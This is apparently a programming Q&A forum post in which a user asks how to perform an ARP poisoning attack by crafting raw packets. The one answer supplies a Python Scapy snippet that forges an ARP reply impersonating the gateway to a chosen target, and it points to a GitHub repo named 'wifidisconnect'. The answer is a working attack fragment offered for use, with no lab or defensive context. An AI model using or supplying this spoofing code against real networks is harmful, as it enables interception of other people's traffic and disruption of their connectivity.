# I want to perform a ARP poisoning attack

Tags: python, scripting, arp

I want to perform a ARP poisoning attack but have to manipulate the bits of the raw packets, is there any way that can be done?Since i have tried a lot of them and none of them seems to work

Answer (score -1):

You can use python scapy to perform the arp cache poisoning

```
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
send(poison_target)
```

You can refer this [repo](https://github.com/ajaykumarkk/wifidisconnect) on github.